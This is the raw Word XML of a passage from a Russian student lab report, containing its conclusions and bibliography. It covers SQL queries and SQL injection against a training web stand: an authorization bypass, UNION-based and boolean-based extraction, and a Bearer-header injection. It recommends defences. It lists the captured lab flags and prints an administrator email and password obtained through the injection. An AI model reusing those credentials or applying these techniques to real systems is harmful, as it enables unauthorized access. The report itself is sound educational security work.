        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc229005062"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Выводы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="58F85230" w14:textId="6FFEF963" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t xml:space="preserve">В первой части лабораторной работы были реализованы SQL-запросы к отношениям </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document_operations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, соответствующим варианту № 8. Запросы охватывали разные приемы работы с SQL: фильтрацию по атрибутам, группировку, агрегирование, обработку дат, проверку отсутствия строк через NOT EXISTS и анализ выполнения полного набора операций. Все запросы были выполнены в отдельной базе subd_lab3, а результаты были сохранены в логах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A586162" w14:textId="0383BD3A" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t>Первый запрос позволил определить сотрудника, ответственного более чем за один секретный документ заданной степени секретности. Второй запрос позволил выбрать документы, срок окончания действия которых не входит в заданный перечень месяцев. Третий запрос объединил две логики: поиск сотрудников, выполнивших все операции из заданного перечня, и поиск ответственных сотрудников, не выполнявших собственных операций по закрепленным документам. Полученные результаты были непустыми и соответствовали подготовленным тестовым данным</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B35EF0B" w14:textId="5414E76A" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t xml:space="preserve">Во второй части была выполнена эксплуатация SQL-инъекций на учебном </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-стенде </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cheerful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-Island. Основной уязвимостью стала небезопасная подстановка параметров </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в SQL-запрос авторизации. Через эту уязвимость был выполнен обход авторизации, а затем построен UNION-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> канал вывода данных. С его помощью были получены список таблиц, список колонок, значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, сведения о </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и учетные данные пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71257B" w14:textId="098D4749" w:rsidR="00CA1A09" w:rsidRPr="00C2601B" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Были найдены все три флага: ibks1_{653b6e69e46c8}, ibks2_{9a7d9c2fcbeaf} и ibks3_{93f8739c36549}. Итоговый ответ secret_653b6e69e46c89a7d9c2fcbeaf93f8739c36549 был принят порталом, после чего лабораторная получила статус Выполнена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE6AFB3" w14:textId="23B24852" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t xml:space="preserve">Дополнительно была найдена учетная запись администратора everybody_use@rambler.ru с паролем (WUM70hl*5gaAQfg. Вход под этой учетной записью подтвердил, что SQL-инъекция позволяет получить не только флаги, но и </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>реальные учетные данные приложения. Это демонстрирует практический риск хранения и обработки паролей без достаточной защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689D1D6" w14:textId="3E8A20B0" w:rsidR="00CA1A09" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t>Помимо /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, были подтверждены дополнительные уязвимые векторы. Параметр</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>products?category</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">=... </w:t>
      </w:r>
      <w:r>
        <w:t>оказался</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>уязвим</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-based </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA1A09">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION-based SQLi. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Заголовок </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bearer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ... в ручке /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> также оказался уязвим: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с SQL-комментариями вместо пробелов позволил получить профиль другого пользователя. Таким образом, уязвимость приложения не ограничивалась одной формой входа, а затрагивала разные типы входных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94AB4B" w14:textId="35740254" w:rsidR="000639B9" w:rsidRDefault="00CA1A09" w:rsidP="00CA1A09">
      <w:r>
        <w:t xml:space="preserve">По результатам работы были сформулированы меры защиты. Основным требованием является отказ от динамической сборки SQL-запросов и переход на параметризованные запросы. Также необходимо отключить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>debug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-режим, ограничить права пользователя БД, безопасно реализовать авторизацию, не использовать логин как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bearer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-токен, корректно обрабатывать ошибки и тестировать SQL-код с учетом конкретной используемой СУБД. Эти меры позволили бы предотвратить обнаруженные способы эксплуатации или существенно снизить их последствия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66495E" w14:textId="654B2343" w:rsidR="00EA504A" w:rsidRDefault="00EA504A" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="af8"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="_Toc229005063"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Список используемых источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="2B199C67" w14:textId="7D9E535E" w:rsidR="00EA504A" w:rsidRPr="008674D7" w:rsidRDefault="000639B9" w:rsidP="008674D7">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Моргунов, Е. П. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Основы языка </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> учебное пособие / Е. П. Моргунов ; под ред. Е. В. Рогова, П. В. Лузанова. — Санкт-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Петербург :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> БХВ-Петербург, 2018. — 336 с.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1501D0" w14:textId="301F7CC5" w:rsidR="000639B9" w:rsidRPr="00A64D35" w:rsidRDefault="000639B9" w:rsidP="000639B9">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Полтавцева</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, М. А. Практикум по построению защищенных баз данных: учебное пособие / М. А. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Полтавцева</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [и др.]. — Санкт-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Петербург :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ПОЛИТЕХ-ПРЕСС, 2023. — 182 с.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A3A2E1" w14:textId="4D52984D" w:rsidR="00EA504A" w:rsidRDefault="000639B9" w:rsidP="008674D7">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рогов, Е. В. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 15 изнутри / Е. В. Рогов. — </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Москва :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ДМК Пресс, 2023. — 662 с.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A9949E" w14:textId="001CC3AB" w:rsidR="000639B9" w:rsidRDefault="000639B9" w:rsidP="008674D7">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000639B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL Global Development Group. PostgreSQL Documentation: GRANT. — </w:t>
      </w:r>
      <w:r>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="000639B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="000639B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00CC526A" w:rsidRPr="00A64990">
          <w:rPr>
            <w:rStyle w:val="aff2"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.postgresql.org/docs/current/sql-grant.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EA89FFA" w14:textId="7881055E" w:rsidR="00CC526A" w:rsidRDefault="00823929" w:rsidP="00CC526A">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL Global Development Group. PostgreSQL Documentation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libpq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and SQL parameterization. — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: https://www.postgresql.org/docs/current/libpq-exec.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EDEC7" w14:textId="37669478" w:rsidR="00823929" w:rsidRPr="00CC526A" w:rsidRDefault="00823929" w:rsidP="00CC526A">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. SQL Injection Prevention Cheat Sheet. — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00823929">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttps://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC6117" w14:textId="1A5FEF38" w:rsidR="00EA504A" w:rsidRPr="000639B9" w:rsidRDefault="00EA504A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EA504A" w:rsidRPr="000639B9" w:rsidSect="00D60F71">
      <w:footerReference w:type="default" r:id="rId25"/>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0BF5" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRPr="00D60F71" w:rsidRDefault="00BD3D8B" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5F740B" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRDefault="00BD3D8B"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F2B8007" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRPr="00D60F71" w:rsidRDefault="00BD3D8B" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB8FBE" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRDefault="00BD3D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00000287" w:usb1="08070000"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83606" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRPr="00D60F71" w:rsidRDefault="00BD3D8B" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D54F4" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRDefault="00BD3D8B"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F400308" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRPr="00D60F71" w:rsidRDefault="00BD3D8B" w:rsidP="00D60F71">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1112A" w14:textId="77777777" w:rsidR="00BD3D8B" w:rsidRDefault="00BD3D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41CA565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639B9"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="000B060E"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000C2407"/>
    <w:rsid w:val="000E3888"/>
    <w:rsid w:val="00126CD7"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00160CFD"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="00166291"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001D4146"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00223005"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="002629B9"/>
    <w:rsid w:val="00277DBA"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00353231"/>
    <w:rsid w:val="00355241"/>
    <w:rsid w:val="003668B4"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="004038DA"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="00425BAE"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00572DB0"/>
    <w:rsid w:val="005C0A3C"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="0066289B"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00682CB2"/>
    <w:rsid w:val="006865A4"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="0071636D"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00730657"/>
    <w:rsid w:val="007634CF"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="007A62FE"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="0080381E"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00823929"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008434BB"/>
    <w:rsid w:val="008529EF"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="008674D7"/>
    <w:rsid w:val="008D773E"/>
    <w:rsid w:val="00903505"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00965B97"/>
    <w:rsid w:val="00966B0F"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="00994ED8"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>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B4B"/>
    <w:rsid w:val="00B20597"/>
    <w:rsid w:val="00B53CBD"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BA148B"/>
    <w:rsid w:val="00BD3D8B"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00BE490B"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C2601B"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C8578E"/>
    <w:rsid w:val="00CA1A09"/>
    <w:rsid w:val="00CC526A"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D53D81"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DF5ACB"/>
    <w:rsid w:val="00E014B6"/>
    <w:rsid w:val="00E11E5A"/>
    <w:rsid w:val="00E14A23"/>
    <w:rsid w:val="00E34A15"/>
    <w:rsid w:val="00E5536B"/>
    <w:rsid w:val="00E56B7C"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00EA504A"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F023F7"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F868F8"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00F92FA9"/>
    <w:rsid w:val="00FA7108"/>
    <w:rsid w:val="00FB440B"/>
    <w:rsid w:val="00FB5D42"/>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23005"/>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99197">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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85236">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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133191">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
